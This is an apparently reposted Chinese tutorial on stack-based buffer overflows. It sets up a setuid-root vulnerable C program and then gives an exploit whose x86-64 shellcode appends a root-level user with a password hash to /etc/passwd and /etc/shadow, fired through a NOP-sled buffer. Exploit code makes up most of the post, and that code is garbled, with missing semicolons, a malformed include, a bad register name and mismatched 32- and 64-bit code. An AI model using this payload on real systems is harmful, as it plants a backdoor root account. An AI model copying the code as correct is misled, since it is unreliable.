基于堆栈的溢出

Posted 2020-10-31 98lucifer

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了基于堆栈的溢出相关的知识，希望对你有一定的参考价值。

int main(int argv,char * argv[])
{
 char buffer[500];
 strcpy(buffer,argv[1]);
 return 0;           
}

这个程序接受一个500字节的缓冲区，而不管参数占用了多大空间。下面是这个程序的正常编译和结果

技术分享图片

除了错误地管理了存储器外，实际上什么也没错。现在，为了使程序真正的易受攻击，必须将程序的所有权修改成root，并且必须为编译后的文件打开suid权限位

sudo chown root vuln
sudo chmod +s vuln

下面是一段exploit代码，创建一个缓冲区并将它注入一个易受攻击的程序，希望在程序奔溃前，欺骗程序执行注入的shellcode。

  1 include<stdlib.h>
  2 #include<stdio.h>
  3 #include<string.h>
  4 #include<unistd.h>
  5 
  6 char shellcode[]=
  7                         /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 01204) */
  8              
  9                         "\\x48\\xbb\\xff\\xff\\xff\\xff\\xff\\x73\\x77\\x64"       /* mov    $0x647773ffffffffff,%rbx */
 10                         "\\x48\\xc1\\xeb\\x28"                               /* shr    $0x28,%rbx */
 11                         "\\x53"                                           /* push   %rbx */
 12                         "\\x48\\xbb\\x2f\\x65\\x74\\x63\\x2f\\x70\\x61\\x73"       /* mov    $0x7361702f6374652f,%rbx */
 13                         "\\x53"                                           /* push   %rbx */
 14                         "\\x48\\x89\\xe7"                                   /* mov    %rsp,%rdi */
 15                         "\\x66\\xbe\\x41\\x04"                               /* mov    $0x441,%si */
 16                         "\\x66\\xba\\x84\\x02"                               /* mov    $0x284,%dx */
 17                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
 18                         "\\xb0\\x02"                                       /* mov    $0x2,%al */
 19                         "\\x0f\\x05"                                       /* syscall */
 20  
 21                         /* write(3, "shell-storm:x:0:0:shell-storm.or"..., 46) */
 22  
 23                         "\\x48\\xbf\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 24                         "\\x48\\xc1\\xef\\x38"                               /* shr    $0x38,%rdi */
 25                         "\\x48\\xbb\\xff\\xff\\x2f\\x62\\x61\\x73\\x68\\x0a"       /* mov    $0xa687361622fffff,%rbx */
 26                         "\\x48\\xc1\\xeb\\x10"                               /* shr    $0x10,%rbx */
 27                         "\\x53"                                           /* push   %rbx */
 28                         "\\x48\\xbb\\x67\\x3a\\x2f\\x3a\\x2f\\x62\\x69\\x6e"       /* mov    $0x6e69622f3a2f3a67,%rbx */
 29                         "\\x53"                                           /* push   %rbx */
 30                         "\\x48\\xbb\\x73\\x74\\x6f\\x72\\x6d\\x2e\\x6f\\x72"       /* mov    $0x726f2e6d726f7473,%rbx */
 31                         "\\x53"                                           /* push   %rbx */
 32                         "\\x48\\xbb\\x30\\x3a\\x73\\x68\\x65\\x6c\\x6c\\x2d"       /* mov    $0x2d6c6c6568733a30,%rbx */
 33                         "\\x53"                                           /* push   %rbx */
 34                         "\\x48\\xbb\\x6f\\x72\\x6d\\x3a\\x78\\x3a\\x30\\x3a"       /* mov    $0x3a303a783a6d726f,%rbx */
 35                         "\\x53"                                           /* push   %rbx */
 36                         "\\x48\\xbb\\x73\\x68\\x65\\x6c\\x6c\\x2d\\x73\\x74"       /* mov    $0x74732d6c6c656873,%rbx */
 37                         "\\x53"                                           /* push   %rbx */
 38                         "\\x48\\x89\\xe6"                                   /* mov    %rsp,%rsi */
 39                         "\\x48\\xba\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x2e"       /* mov    $0x2effffffffffffff,%rdx */
 40                         "\\x48\\xc1\\xea\\x38"                               /* shr    $0x38,%rdx */
 41                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
 42                         "\\xb0\\x01"                                       /* mov    $0x1,%al */
 43                         "\\x0f\\x05"                                       /* syscall */
 44  
 45                         /* close(3) */
 46  
 47                         "\\x48\\xbf\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 48                         "\\x48\\xc1\\xef\\x38"                               /* shr    $0x38,%rdi */
 49                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
 50                         "\\xb0\\x03"                                       /* mov    $0x3,%al */
 51                         "\\x0f\\x05"                                       /* syscall */
 52  
 53                         /* Xor */
 54  
 55                         "\\x48\\x31\\xdb"                                   /* xor    %rbx,%rbx */
 56                         "\\x48\\x31\\xff"                                   /* xor    %rdi,%rdi */
 57                         "\\x48\\x31\\xf6"                                   /* xor    %rsi,%rsi */
 58                         "\\x48\\x31\\xd2"                                   /* xor    %rdx,%rdx */
 59  
 60                         /* open("/etc/shadow", O_WRONLY|O_CREAT|O_APPEND, 01204) */
 61  
 62                         "\\x48\\xbb\\xff\\xff\\xff\\xff\\xff\\x64\\x6f\\x77"       /* mov    $0x776f64ffffffffff,%rbx */
 63                         "\\x48\\xc1\\xeb\\x28"                               /* shr    $0x28,%rbx */
 64                         "\\x53"                                           /* push   %rbx */
 65                         "\\x48\\xbb\\x2f\\x65\\x74\\x63\\x2f\\x73\\x68\\x61"       /* mov    $0x6168732f6374652f,%rbx  */
 66                         "\\x53"                                           /* push   %rbx */
 67                         "\\x48\\x89\\xe7"                                   /* mov    %rsp,%rdi */
 68                         "\\x66\\xbe\\x41\\x04"                               /* mov    $0x441,%si */
 69                         "\\x66\\xba\\x84\\x02"                               /* mov    $0x284,%dx */
 70                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
 71                         "\\xb0\\x02"                                       /* mov    $0x2,%al */
 72                         "\\x0f\\x05"                                       /* syscall *
 73  
 74                         /* write(3, "shell-storm:$1$reWE7GM1$axeMg6LT"..., 59) */
 75              
 76                         "\\x48\\xbf\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x03"       /* mov    $0x3ffffffffffffff,%rdi */
 77                         "\\x48\\xc1\\xef\\x38"                               /* shr    $0x38,%rdi */
 78                         "\\x48\\xbb\\xff\\xff\\xff\\xff\\xff\\x3a\\x3a\\x0a"       /* mov    $0xa3a3affffffffff,%rbx */
 79                         "\\x48\\xc1\\xeb\\x28"                               /* shr    $0x28,%rbx */
 80                         "\\x53"                                           /* push   %rbx */
 81                         "\\x48\\xbb\\x34\\x37\\x37\\x38\\x3a\\x3a\\x3a\\x3a"       /* mov    $0x3a3a3a3a38373734,%rbx */
 82                         "\\x53"                                           /* push   %rbx */
 83                         "\\x48\\xbb\\x5a\\x30\\x55\\x33\\x4d\\x2f\\x3a\\x31"       /* mov    $0x313a2f4d3355305a,%rbx */
 84                         "\\x53"                                           /* push   %rbx */
 85                         "\\x48\\xbb\\x73\\x2f\\x50\\x64\\x53\\x67\\x63\\x46"       /* mov    $0x4663675364502f73,%rbx */
 86                         "\\x53"                                           /* push   %rbx */
 87                         "\\x48\\xbb\\x61\\x78\\x65\\x4d\\x67\\x36\\x4c\\x54"       /* mov    $0x544c36674d657861,%rbx */
 88                         "\\x53"                                           /* push   %rbx */
 89                         "\\x48\\xbb\\x65\\x57\\x45\\x37\\x47\\x4d\\x31\\x24"       /* mov    $0x24314d4737455765,%rbx */
 90                         "\\x53"                                           /* push   %rbx */
 91                         "\\x48\\xbb\\x6f\\x72\\x6d\\x3a\\x24\\x31\\x24\\x72"       /* mov    $0x722431243a6d726f,%rbx  */
 92                         "\\x53"                                           /* push   %rbx */
 93                         "\\x48\\xbb\\x73\\x68\\x65\\x6c\\x6c\\x2d\\x73\\x74"       /* mov    $0x74732d6c6c656873,%rbx */
 94                         "\\x53"                                           /* push   %rbx */
 95                         "\\x48\\x89\\xe6"                                   /* mov    %rsp,%rsi */
 96                         "\\x48\\xba\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x3b"       /* mov    $0x3bffffffffffffff,%rdx */
 97                         "\\x48\\xc1\\xea\\x38"                               /* shr    $0x38,%rdx */
 98                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
 99                         "\\xb0\\x01"                                       /* mov    $0x1,%al */
100                         "\\x0f\\x05"                                       /* syscall */     
101  
102                         /* close(3) */
103  
104                         "\\x48\\xbf\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x03"       /* mov    $0x3ffffffffffffff,%rdi */
105                         "\\x48\\xc1\\xef\\x38"                               /* shr    $0x38,%rdi */
106                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
107                         "\\xb0\\x03"                                       /* mov    $0x3,%al */
108                         "\\x0f\\x05"                                       /* syscall */
109  
110                         /* _exit(0) */
111  
112                         "\\x48\\x31\\xff"                                   /* xor    %rdi,%rdi */
113                         "\\x48\\x31\\xc0"                                   /* xor    %rax,%rax */
114                         "\\xb0\\x3c"                                       /* mov    $0x3c,%al */
115                         "\\x0f\\x05";                                      /* syscall */
116 
117 
118 unsigned long sp(void)
119 {
120 __asm__("movl %esp,%eas") //用于返回堆栈指针
121 }
122  
123 int main(int argc,char * argv[])
124 {
125 int i,offset //offset 偏移量
126 long esp,ret,*addr_ptr
127 char *buffer,*ptr
128 offset=0; // 使用0偏移量
129 esp=sp(); //将当前堆栈指针放入ESP 
130 ret=esp-offset //我们要覆盖RET地址
131 
132 buffer=malloc(600) //600字节缓冲区 
133 //用RET地址填充整个缓冲区 
134 ptr=buffer;
135 addr_ptr=(long *)ptr;
136 for(i=0;i<600;i+=4)
137     *(addr_ptr++)=ret;
138 //用NOP指令填充前200字节
139 for(i=0;i<200;i++)
140     buffer[i]=‘\\x90‘;
141 //把shellCode放在NOP后面
142 ptr=buffer+200;
143 for(i=0;i<strlen(shellcode);i++)
144 *(ptr++)=shellcode[i];
145 buffer[600-1]=0;
146 execl("./vuln",vuln,buffer,0);
147 free(buffer);
148 return 0
149 }

下面是这个程序的执行结果

技术分享图片

以上是关于基于堆栈的溢出的主要内容，如果未能解决你的问题，请参考以下文章

系统在此应用程序中检测到基于堆栈的缓冲区溢出。溢出...

Buffer lab——20145326蔡馨熠

堆栈溢出一般是由啥原因导致的？

VectorKit MapKit 堆栈溢出崩溃

函数堆栈溢出

基于堆栈的溢出